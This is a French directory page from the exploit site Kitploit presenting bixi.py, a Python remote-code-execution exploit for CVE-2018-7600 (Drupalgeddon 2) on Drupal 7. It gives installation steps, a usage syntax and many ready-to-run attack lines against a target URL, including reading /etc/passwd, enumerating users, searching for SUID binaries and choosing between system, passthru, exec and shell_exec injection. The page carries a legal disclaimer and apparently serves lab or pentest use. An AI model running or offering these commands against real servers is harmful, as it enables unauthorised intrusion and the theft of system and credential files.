Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Drupalgeddon2-CVE-2018-7600 — Exploit Python pour CVE-2018-7600 (Drupalgeddon 2) permettant l'exécution de code à distance sur Drupal 7 avec plusieurs méthodes d'injection et des commandes prédéfinies pour Linux et Windows. | Kitploit
Outils/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

Exploit Python pour CVE-2018-7600 (Drupalgeddon 2) permettant l'exécution de code à distance sur Drupal 7 avec plusieurs méthodes d'injection et des commandes prédéfinies pour Linux et Windows.

Voir le dépôt
il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔥 Exploit Drupalgeddon 2 — bixi.py

📖 Description

bixi.py est un exploit pour la vulnérabilité CVE‑2018‑7600 (Drupalgeddon 2) qui affecte Drupal 7. Il permet l'exécution de commandes à distance (RCE) sur des serveurs Drupal vulnérables via une interface intuitive et des commandes prédéfinies.


⚠️ DISCLAIMER / AVIS LÉGAL

CE LOGICIEL EST UNIQUEMENT À DES FINS ÉDUCATIVES ET DE RECHERCHE DANS DES ENVIRONNEMENTS CONTRÔLÉS.

  • Utiliser uniquement sur les systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite de tester
  • L'utilisation non autorisée est ILLÉGALE et peut entraîner des conséquences pénales
  • L'auteur décline toute responsabilité en cas de mauvaise utilisation de cet outil
  • Respectez toujours les lois locales et internationales en matière de cybersécurité

"With great power comes great responsibility"


📋 Caractéristiques

  • ✅ Exploitation automatique de CVE‑2018‑7600
  • ✅ Commandes prédéfinies pour Linux et Windows
  • ✅ Méthodes d'injection multiples (system, passthru, exec, shell_exec)
  • ✅ Interface intuitive avec système d'aide
  • ✅ Gestion robuste des erreurs et des timeouts
  • ✅ Sortie formatée et facile à lire

  • 🚀 Installation Rapide

    1. Cloner le dépôt

    root@kitploit:~
    git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
    cd Drupalgeddon2-CVE-2018-7600
    

    2. Installer les dépendances

    root@kitploit:~
    # Kali / Debian / Ubuntu
    sudo apt update
    sudo apt install python3 python3-pip -y
    pip3 install requests
    
    # Otras distribuciones
    pip3 install requests
    

    3. Donner les permissions d'exécution

    root@kitploit:~
    chmod +x bixi.py
    

    🎯 Utilisation de Base

    Voir l'aide complète

    root@kitploit:~
    python3 bixi.py --help
    

    Syntaxe générale

    root@kitploit:~
    python3 bixi.py <URL> <COMANDO/PALABRA_CLAVE> [INJECTION_TYPE]
    

    Exemples pratiques

    root@kitploit:~
    # Verificar vulnerabilidad
    python3 bixi.py http://10.99.99.6/drupal/ test
    
    # Detectar sistema operativo
    python3 bixi.py http://10.99.99.6/drupal/ linux
    python3 bixi.py http://10.99.99.6/drupal/ windows
    
    # Enumerar usuarios
    python3 bixi.py http://10.99.99.6/drupal/ users_linux
    python3 bixi.py http://10.99.99.6/drupal/ net_user
    
    # Información del sistema
    python3 bixi.py http://10.99.99.6/drupal/ ifconfig
    python3 bixi.py http://10.99.99.6/drupal/ ipconfig
    
    # Comandos personalizados
    python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
    python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"
    

    📊 Mots-clés Prédéfinis

    🐧 Linux

    CommandeDescription
    linuxInformations système
    users_linuxLister les utilisateurs
    idInfos utilisateur/groupes
    lsLister les fichiers
    ifconfigInfos réseau
    find_flagRechercher des flags

    🪟 Windows

    CommandeDescription
    windowsInformations système
    net_userLister les utilisateurs
    whoami_winInfos détaillées
    ipconfigRéseau
    netstat_winConnexions
    dirLister le répertoire

    🔧 Pentesting

    CommandeDescription
    sudoVérifier les privilèges sudo
    suidRechercher les binaires SUID
    net_localgroupGroupes locaux
    drupal_configRechercher les configurations
    drupal_versionObtenir la version de Drupal

    🎨 Méthodes d'Injection

    root@kitploit:~
    # system (default)
    python3 bixi.py http://target/ "whoami" system
    
    # passthru
    python3 bixi.py http://target/ "whoami" passthru
    
    # exec
    python3 bixi.py http://target/ "whoami" exec
    
    # shell_exec
    python3 bixi.py http://target/ "whoami" shell_exec
    

    🏗️ Structure du Projet

    root@kitploit:~
    drupalgeddon2-exploit/
    │
    ├── bixi.py
    ├── README.md
    ├── requirements.txt
    ├── examples/
    │   ├── linux_commands.txt
    │   └── windows_commands.txt
    └── screenshots/
        ├── help_screen.png
        └── exploit_success.png
    

    🔧 Configuration Avancée

    Proxy (facultatif)

    root@kitploit:~
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    

    Délai d'attente

    Modifier la valeur par défaut (15 secondes) :

    root@kitploit:~
    timeout=15
    

    Ajouter de nouvelles commandes

    Modifier le dictionnaire commands dans get_command_for_keyword().


    🐛 Résolution des Problèmes

    Erreur : No module named 'requests'

    root@kitploit:~
    pip3 install requests
    

    Erreur : Connexion refusée

    root@kitploit:~
    # Verificar conectividad
    ping TARGET_IP
    
    # Verificar ruta Drupal
    curl http://TARGET_IP/drupal/
    
    Télécharger l’outil